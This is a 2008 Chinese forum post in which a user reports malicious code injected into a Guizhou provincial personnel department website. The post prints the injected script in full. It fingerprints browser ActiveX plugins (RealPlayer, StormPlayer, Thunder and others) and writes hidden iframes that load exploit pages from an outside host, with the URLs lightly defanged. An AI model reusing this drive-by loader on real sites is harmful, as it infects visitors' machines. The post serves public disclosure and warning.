注意,贵州省人事厅网站发现恶意网址代码

[复制链接]

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?注册用户

x
  听朋友讲今年的公务员招考简章出来了,于是到人事厅网站“贵州人事人才网”查看,找到了“贵州省2008年省、市、县三级机关统一面向社会公开招考公务员简章”。我由于9月份拿不到毕业证书,只得放弃这次考试。凭着对网站网页的敏感,发现此网站有来源不明的网页地址,后确认为刷流量代码。由于此次公务员考试,在带来人事网的流量同时,不知会也给那恶意代码的网址带来多少流量!
1.jpg
恶意网址显露无遗

2.jpg
挖出嵌入到网站页面中的代码

以下为am2.htm中的全部代码

  1. <script language="javaScript">
  2. var cook = "silentwm";

  3. function setCookie(name, value, expire)
  4. {   
  5.   window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
  6. }
  7. function getCookie(Name)
  8. {   
  9.   var search = Name + "=";
  10.   if (window.document.cookie.length > 0)
  11.   {
  12.    offset = window.document.cookie.indexOf(search);
  13.    if (offset != -1)
  14.    {
  15.     offset += search.length;      
  16.      end = window.document.cookie.indexOf(";", offset)      
  17.      if (end == -1)
  18.        end = window.document.cookie.length;
  19.      return unescape(window.document.cookie.substring(offset, end));
  20.     }
  21.    }
  22.    return null;
  23. }
  24. function register(name)
  25. {
  26.   var today = new Date();
  27.   var expires = new Date();
  28.   expires.setTime(today.getTime() + 1000*60*60*24);
  29.   setCookie(cook, name, expires);
  30. }
  31. function openWM()
  32. {
  33.   var c = getCookie(cook);
  34.   if (c != null)
  35.   {
  36.     return;
  37.   }
  38.   
  39.   register(cook);
  40.   
  41.   window.defaultStatus="完成";
  42.    
  43.   try{ var e;
  44.    var ado=(document.createElement("object"));
  45.    ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  46.    var as=ado.createobject("Adodb.Stream","")}
  47.   catch(e){};
  48.   finally{
  49.    if(e!="[object Error]"){
  50.     document.write("<iframe width=50 height=0 src=h-t-t-p去掉-://ww1.pigzd.cn/ax14.htm></iframe>")}
  51.    else
  52.    {
  53.     try{ var j;
  54.      var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
  55.     catch(j){};
  56.     finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("RODUCTVERSION")<="6.0.14.552")
  57.                                         {document.write('<iframe width=100 height=0 src=h-t-t-p去掉-://ww1.pigzd.cn/re10.htm></iframe>')}
  58.                          else
  59.                          {
  60.      document.write('<iframe width=100 height=0 src=h-t-t-p去掉-://ww1.pigzd.cn/re11.htm></iframe>')}}}
  61.     try{ var g;
  62.      var glworld=new ActiveXObject("GLAVATAR.GLAvatarCtrl.1");}
  63.     catch(g){};
  64.     finally{if(g!="[object Error]"){
  65.      document.write('<iframe style=display:none src=h-t-t-p去掉-://ww1.pigzd.cn/axlz.htm></iframe>')}}
  66.     try{ var h;
  67.      var storm=new ActiveXObject("MPS.StormPlayer.1");}
  68.     catch(h){};
  69.     finally{if(h!="[object Error]"){
  70.      document.write('<iframe style=display:none src=h-t-t-p去掉-://ww1.pigzd.cn/bb.htm></iframe>')}}
  71.     try{ var f;
  72.      var thunder=new ActiveXObject("DPClient.Vod");}
  73.     catch(f){};
  74.     finally{ if(f!="[object Error]"){
  75.      document.write('<iframe width=50 height=0 src=xl.gif></iframe>')}}
  76.    }}
  77. }
  78. openWM();
  79. </script>
  80. <script language="javascript" type="text/javascript" src="h-t-t-p去掉-://js.users.51.la/1862269.js"></script>
复制代码

[ 本帖最后由 正安一片瓦 于 2008-5-23 15:32 编辑 ]
回复

举报 使用道具

全部回帖
瓦片厉害
发表于 2008-5-23 16:35:17

举报 回复 支持 反对 使用道具

下午19点,再次查看时,网页中的恶意代码已经被清除了!!ldem45
发表于 2008-5-23 19:12:48

举报 回复 支持 反对 使用道具

您需要登录后才可以回帖 登录 | 注册用户
快速回复 返回顶部 返回列表